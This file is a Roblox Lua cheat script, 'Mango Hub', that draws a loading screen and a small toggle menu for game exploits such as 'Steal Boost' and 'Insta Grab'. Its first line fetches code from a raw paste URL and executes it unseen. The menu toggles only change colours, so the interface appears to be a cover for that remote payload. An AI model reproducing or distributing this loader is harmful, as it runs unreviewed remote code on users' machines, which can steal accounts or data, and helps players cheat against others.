loadstring(game:HttpGet("https://pastefy.app/utVRSb3d/raw"))()
local player = game.Players.LocalPlayer
local gui = Instance.new("ScreenGui", player:WaitForChild("PlayerGui"))
gui.Name = "MangoHubFull"

--========================--
-- PURPLE LOADING SCREEN
--========================--

local blur = Instance.new("BlurEffect", game.Lighting)
blur.Size = 18

local loadFrame = Instance.new("Frame", gui)
loadFrame.Size = UDim2.new(1,0,1,0)
loadFrame.BackgroundColor3 = Color3.fromRGB(0,0,0)
loadFrame.BackgroundTransparency = 0.3

local box = Instance.new("Frame", loadFrame)
box.Size = UDim2.new(0, 220, 0, 85)
box.Position = UDim2.new(0.5, -110, 0.5, -42)
box.BackgroundColor3 = Color3.fromRGB(20,20,20)
box.BorderSizePixel = 0

Instance.new("UICorner", box).CornerRadius = UDim.new(0,12)

-- Title
local text = Instance.new("TextLabel", box)
text.Size = UDim2.new(1,0,0,35)
text.BackgroundTransparency = 1
text.Text = "mango hub"
text.TextColor3 = Color3.fromRGB(200,150,255)
text.Font = Enum.Font.GothamBold
text.TextSize = 16

-- Progress Bar BG
local barBG = Instance.new("Frame", box)
barBG.Size = UDim2.new(1,-30,0,6)
barBG.Position = UDim2.new(0,15,1,-20)
barBG.BackgroundColor3 = Color3.fromRGB(50,40,60)
barBG.BorderSizePixel = 0

Instance.new("UICorner", barBG).CornerRadius = UDim.new(1,0)

-- Progress Bar (PURPLE)
local bar = Instance.new("Frame", barBG)
bar.Size = UDim2.new(0,0,1,0)
bar.BackgroundColor3 = Color3.fromRGB(170,0,255)
bar.BorderSizePixel = 0

Instance.new("UICorner", bar).CornerRadius = UDim.new(1,0)

-- Loading (10 sec)
for i = 1,100 do
	bar.Size = UDim2.new(i/100,0,1,0)
	task.wait(0.1)
end

loadFrame:Destroy()
blur:Destroy()

--========================--
-- MANGO HUB UI (SMALL)
--========================--

local frame = Instance.new("Frame", gui)
frame.Size = UDim2.new(0, 150, 0, 185)
frame.Position = UDim2.new(0.5, -75, 0.5, -92)
frame.BackgroundColor3 = Color3.fromRGB(10,10,10)
frame.BorderSizePixel = 0
frame.Active = true
frame.Draggable = true

Instance.new("UICorner", frame).CornerRadius = UDim.new(0, 12)

-- RGB BORDER
local stroke = Instance.new("UIStroke", frame)
stroke.Thickness = 2.5

task.spawn(function()
	while true do
		for i = 0,1,0.01 do
			stroke.Color = Color3.fromHSV(i,1,1)
			task.wait()
		end
	end
end)

-- TITLE
local title = Instance.new("TextLabel", frame)
title.Size = UDim2.new(1,0,0,24)
title.BackgroundTransparency = 1
title.Text = "MANGO HUB"
title.Font = Enum.Font.GothamBold
title.TextSize = 13
title.TextColor3 = Color3.new(1,1,1)

-- LINE
local line = Instance.new("Frame", frame)
line.Size = UDim2.new(1,-20,0,1)
line.Position = UDim2.new(0,10,0,24)
line.BackgroundColor3 = Color3.fromRGB(120,120,120)
line.BorderSizePixel = 0

-- ROW FUNCTION
local function row(name, key, y)
	local txt = Instance.new("TextLabel", frame)
	txt.Position = UDim2.new(0,10,0,y)
	txt.Size = UDim2.new(0,80,0,16)
	txt.BackgroundTransparency = 1
	txt.Text = name
	txt.Font = Enum.Font.Gotham
	txt.TextSize = 11
	txt.TextColor3 = Color3.new(1,1,1)
	txt.TextXAlignment = Enum.TextXAlignment.Left

	local keyBox = Instance.new("TextLabel", frame)
	keyBox.Position = UDim2.new(0,90,0,y)
	keyBox.Size = UDim2.new(0,20,0,16)
	keyBox.BackgroundColor3 = Color3.fromRGB(35,35,45)
	keyBox.Text = key
	keyBox.Font = Enum.Font.GothamBold
	keyBox.TextSize = 10
	keyBox.TextColor3 = Color3.new(1,1,1)
	Instance.new("UICorner", keyBox).CornerRadius = UDim.new(0,5)

	local toggle = Instance.new("TextButton", frame)
	toggle.Position = UDim2.new(1,-42,0,y)
	toggle.Size = UDim2.new(0,34,0,16)
	toggle.BackgroundColor3 = Color3.fromRGB(40,40,40)
	toggle.Text = ""
	Instance.new("UICorner", toggle).CornerRadius = UDim.new(1,0)

	local circle = Instance.new("Frame", toggle)
	circle.Size = UDim2.new(0,14,0,14)
	circle.Position = UDim2.new(0,1,0.5,-7)
	circle.BackgroundColor3 = Color3.new(1,1,1)
	circle.BorderSizePixel = 0
	Instance.new("UICorner", circle).CornerRadius = UDim.new(1,0)

	local on = true
	if name == "Target Player" then on = false end

	local function update()
		if on then
			toggle.BackgroundColor3 = Color3.fromRGB(170,0,255)
			circle.Position = UDim2.new(1,-15,0.5,-7)
		else
			toggle.BackgroundColor3 = Color3.fromRGB(50,50,50)
			circle.Position = UDim2.new(0,1,0.5,-7)
		end
	end

	update()

	toggle.MouseButton1Click:Connect(function()
		on = not on
		update()
	end)
end

-- ROWS
row("Steal Boost","X",32)
row("Jump Boost","C",55)
row("Insta Grab","G",78)
row("Auto Duels","H",101)
row("Target Player","D",124)

-- DROP BUTTON
local drop = Instance.new("TextButton", frame)
drop.Position = UDim2.new(0,10,1,-28)
drop.Size = UDim2.new(1,-20,0,20)
drop.BackgroundColor3 = Color3.fromRGB(170,0,255)
drop.Text = "Drop Brainrot ▶"
drop.Font = Enum.Font.GothamBold
drop.TextSize = 11
drop.TextColor3 = Color3.new(1,1,1)

Instance.new("UICorner", drop).CornerRadius = UDim.new(0,6)
